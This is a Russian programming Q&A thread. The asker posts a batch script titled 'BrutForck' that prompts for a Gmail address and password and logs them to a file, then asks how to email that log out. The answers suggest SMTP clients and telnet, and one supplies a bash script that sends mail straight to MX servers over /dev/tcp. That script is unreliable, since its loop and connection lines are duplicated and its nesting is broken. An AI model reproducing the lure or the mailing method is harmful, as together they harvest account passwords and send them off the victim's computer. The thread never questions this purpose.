# Как в windows реализовать отправку лог файла на почту без сторонних программ?

Tags: windows, email, логирование

```
@echo off
chcp 1251
cls
title BrutForck (Введите почту и пароль вашего аккаунта)
set /p gm=Gmail:
set /p log=Password:
echo Gmail:%gm% Pass:%log% >>Logs.txt
```

Answer (score 4, accepted):

Никак, всё равно нужен какой-нибудь smtp клиент. Можно конечно загнаться с [telnet](https://www.google.ru/search?ie=UTF-8&hl=ru&q=telnet%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BA%D0%B0%20%D0%BF%D0%BE%D1%87%D1%82%D1%8B&gws_rd=ssl), но лучше не строить костыли, а взять всё-таки софт для этого предназначенный и работать уже с ним.

Comment: тем более, что telnet по умолчанию в современных версиях отсутствует емнип

Comment: Нет. в Win7 он всё ещё есть, просто не установлен по-дефолту. Можно включить в "Программах и компонентах".

Comment: У меня он включен,как это рплизовать через теленет?

Comment: Я знаю команду типо net file но я её непонимаю

Comment: ЕСЛИ ТАК ГЕЛЬЗЯ ТО КАК МОЖНО,ДАЙТЕ ГОТОВЫЙ СКРИПТ С РАЗБОРОМ ЧТО ТАМ ДА КАК

Comment: Нельзя*........

Comment: Конкретных примеров не скажу (не приходилось пользоваться), но есть кроссплатформенная прога для отправки почты: http://msmtp.sf.net. Тут (https://habrahabr.ru/post/78193/) есть пример настройки как раз под винду. Ну и на самом сайте есть пример конфига.

Answer (score 1):

Могу рассказать (примерно):
нужно установить в Windows поддержку Linux, для этого есть несколько способов.
WSL или Windows, Cygwin и т.д.
главное чтобы можно было запустить линуксовый bash скрипт
и линкусовая команда: dig.
далее с помощью данного скрипта можно отправлять письма:

```
MAIL_FROM="no-reply@domain.com"
RCPT_TO="user@domain.com"
MESSAGE1="From: Mail Server <$MAIL_FROM>"
MESSAGE2="To: User <$RCPT_TO>"
MESSAGE3="Subject: здесь тема письма"
MESSAGE4="здесь сообщение в письме"
SMTP_PORT=25
SMTP_DOMAIN=${RCPT_TO##*@}

index=1
while read PRIORITY RELAY
do
    RELAY[$index]=$RELAY
    ((index++))
done < <( /usr/bin/dig +short MX $SMTP_DOMAIN )

RELAY_COUNT=${#RELAY[@]}
SMTP_COMMANDS=( "HELO $HOSTNAME" "MAIL FROM: <$MAIL_FROM>" "RCPT TO: <$RCPT_TO>" "DATA" "." "QUIT" )
SMTP_REPLY=([25]=OK [50]=FAIL [51]=FAIL [52]=FAIL [53]=FAIL [54]=FAIL [55]=FAIL [45]=WAIT [35]=DATA [22]=SENT)

for (( i = 1 ; i < RELAY_COUNT ; i++ ))
do
    SMTP_HOST="${RELAY[$i]}"
    echo "Trying relay [$i]: $SMTP_HOST..."
    exec 5<>/dev/tcp/$SMTP_HOST/$SMTP_PORT
    read HELO <&5
    echo GOT: $HELO
    for COMMAND_ORDER in 0 1 2 3 4 5 6 7
    do
    SMTP_HOST="${RELAY[$i]}"
    echo "Trying relay [$i]: $SMTP_HOST..."
    exec 5<>/dev/tcp/$SMTP_HOST/$SMTP_PORT
    read HELO <&5
    echo GOT: $HELO
    for COMMAND_ORDER in 0 1 2 3 4 5 6 7
    do
            OUT=${SMTP_COMMANDS[COMMAND_ORDER]}
            echo SENDING: $OUT
            echo -e "$OUT\r" >&5

            read -r REPLY <&5
            echo REPLY: $REPLY
            # CODE=($REPLY)
            CODE=${REPLY:0:2}
            ACTION=${SMTP_REPLY[CODE]}
            case $ACTION in
                    WAIT )          echo Temporarily Fail
                                                    break
                                                    ;;
                    FAIL )          echo Failed
                                                    break
                                                    ;;
                    OK )                            ;;
                    SENT )          exit 0
                                                    ;;
                    DATA )                          echo $MESSAGE1 >&5
                                                    echo $MESSAGE2 >&5
                                                    echo $MESSAGE3 >&5
                                                    echo -e "\n" >&5
                                                    echo $MESSAGE4 >&5
                                                    echo -e "\r" >&5
                                                    ;;
                    * )         echo Unknown SMTP code $CODE
                                                    exit 2
            esac
    done
done
done
```

сюда надо вписать от кого/кому: MAIL_FROM="no-reply@domain.com" RCPT_TO="user@domain.com"
сюда соответственно ... MESSAGE3="Subject: здесь тема письма" MESSAGE4="здесь сообщение в письме"

В Линкусе я им отправляю письма не имея доступ на мейл сервер.

Comment: Т.е. ради одной проги - в одну операционку тащить другую операционку? Воу-воу!

Comment: не надо ничего "тащить", просто установить поддержку линукса в винде.
WSL входит в состав windows 10

Comment: Стесняюсь спросить, т.е. внутри WSL мы не запускаем ещё одну ось?

Comment: да, конечно запускаете, но это примерно тоже самое, что вы пауэр шел запускаете в текстовом режиме. "ось" она конечно, центос например в минимальной конфигурации.
главное не в этом, а что изначально был дан ответ:
"Никак, всё равно нужен какой-нибудь smtp клиент... "
а это не так !

Comment: смтп, обёрнутый в центос, уже не смтп?

Comment: тут его нет (в скрипте) без нег решается

Comment: Но центос-то есть :) Т.е. WSL+центос ради эмуляции смтп/телнета. Жирно. Есть powershell, есть .NET.